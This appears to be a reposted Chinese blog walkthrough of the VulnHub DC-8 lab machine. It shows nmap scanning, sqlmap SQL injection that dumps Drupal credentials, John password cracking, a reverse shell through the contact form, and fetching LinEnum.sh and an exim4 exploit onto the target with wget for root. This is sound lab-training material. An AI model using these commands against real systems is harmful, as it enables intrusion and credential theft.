vulnhub渗透测试靶机DC-8

其他 2020-01-19 11:56:32 阅读次数: 0

靶机下载: https://www.vulnhub.com/entry/dc-8,367/

环境:
kali:192.168.49.129
靶机:192.168.49.12
先arp扫描一下目标靶机的ip地址
在这里插入图片描述
发现192.168.49.12
nmap流程走一下
nmap 192.168.49.12 -p- -sV -sT -T5 -A
在这里插入图片描述
只开放了22和80
浏览器打开,发现是一个用Drupal搭的站
在这里插入图片描述
搞框架搭的站,可先试试已经报出来的漏洞,DC-1就是这么进去的,这里提供一个思路,因为没能成功不做演示。
左侧的板块,链接存在get传参
在这里插入图片描述
在这里插入图片描述
http://192.168.49.12/?nid=1’
随手加一个单引号’ 报错了http://192.168.49.12/?nid=1’
在这里插入图片描述应该存在sql注入,上sqlmap
sqlmap -u http://192.168.49.12/?nid=1
在这里插入图片描述
果然是存在漏洞的,也符合了DC系列的一贯风格,web部分的考点并不很难
这个站应该是有后台的
dirb http://192.168.49.12 先跑着找一下后台
然后我们进数据库找一下管理员密码
sqlmap -u http://192.168.49.12/?nid=1 –dbs
在这里插入图片描述
sqlmap -u http://192.168.49.12/?nid=1 -D d7db –tables
在这里插入图片描述
sqlmap -u http://192.168.49.12/?nid=1 -D d7db -T users –columns
在这里插入图片描述
sqlmap -u http://192.168.49.12/?nid=1 -D d7db -T users -C name,pass –dump
在这里插入图片描述找到了后台管理员的账号和加密过的密码
Drupal有自己的加密算法,网上找一找自己写个脚本就能爆破密文了
这里推荐一个密码爆破工具John(用户名也叫john应该是个提示)
他能根据密文识别出这是Drupal的密码,然后直接调用Drupal的加密算法爆破
我们把账号和密文存成文件dc8.pass.txt
在这里插入图片描述
john –wordlist=passwd.txt dc8.pass.txt
–wordlist是字典,不加这个参数会使用john的默认字典
在这里插入图片描述
如果是第一次运行 则能够跑出john用户的密码是turtle
但是因为我之前跑出来以后,john已经把密文和对应的明文存入了缓存,再次遇到则不会再爆破
如 dc8pass.txt内只有
john: S S DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
运行则会遇到No password hashes left to crack (see FAQ)
在这里插入图片描述
我找了好多国内的博客论坛,都没有提到如何解决这个问题,最后在某国外论坛上看到某个老哥也遇到了同样的问题 使用了—show参数,直接查看已经爆破出来的密码
在这里插入图片描述
(如果没有注意到john这个细节,则会在前后两次爆破同一个弱密码时,错过第二次的弱密码)
成功拿到账号密码john:turtle
查看刚才dirb跑出来的后台 192.168.49.12/user 进入后台
在这里插入图片描述
找了好久 还是终于在Contact Us界面找到了写shell的地方
在这里插入图片描述
save之后 回到VIEW界面
在这里插入图片描述
在这里插入图片描述
这时要先回到kali监听7777端口
在这里插入图片描述
再点Submit
回到kali 已经连上了
python -c “import pty;pty.spawn(’/bin/bash’);” //获取交互式shell
在这里插入图片描述
已经拿到www的shell 下一步是提权
查看系统版本和内核版本
uname –a
lsb_release -a
在这里插入图片描述
Debian 9.1版本太高了暂时还没有可以利用的提权脚本
在这里插入图片描述
sudo –l 查看一下有没有给www可以用的sudo命令
在这里插入图片描述
结果他让我输入三次密码,那就没有可用sudo命令
传一个LinEnum.sh上去试试
在kali 启一个简易的http服务
python3 -m http.server 8080
另一边wget下载就行了,但是一定要在有写权限的目录下,这里我选择了/var/tmp
在这里插入图片描述
加上执行权限chmod 777 LinEnum.sh
./ LinEnum.sh运行
在这里插入图片描述
实在没有思路就查看一下这些文件版本查一下有无漏洞 毕竟sudo都爆出漏洞了
在这里插入图片描述
在这里插入图片描述
正好发现了exim4 存在本地提权漏洞
我们查看这个漏洞的更多信息
在这里插入图片描述
在这里插入图片描述
去到漏洞库
找到下载提权脚本的url
https://www.exploit-db.com/download/46996
给出了两种使用脚本的方法
setuid:
在这里插入图片描述
netcat:
在这里插入图片描述
去到靶机上 wget https://www.exploit-db.com/download/46996
加上权限执行
在这里插入图片描述
报错了,因为window上写的脚本到linux上格式不同
先把及脚本下载到本地,使用dos2unix命令修改文件格式
在这里插入图片描述
再把文件上传到靶机上
运行
在这里插入图片描述
在这里插入图片描述
提权成功
欢迎师傅们指点

MMMy5tery
发布了10 篇原创文章 · 获赞 0 · 访问量 173
私信 关注

猜你喜欢

转载自blog.csdn.net/weixin_46128614/article/details/104037820
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
Java自定义时间格式
同步整形电路
在开发中最最最常用的字符串的属性大集合
Linux 查看端口占用并杀掉
Java基础四:ArrayList
多线程之死锁就是这么简单
mysql 基础命令集
awk 命令详解
Centos6.3编译安装nginx+php步骤
OCR (Optical Character Recognition,光学字符识别)
每日归档
更多
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022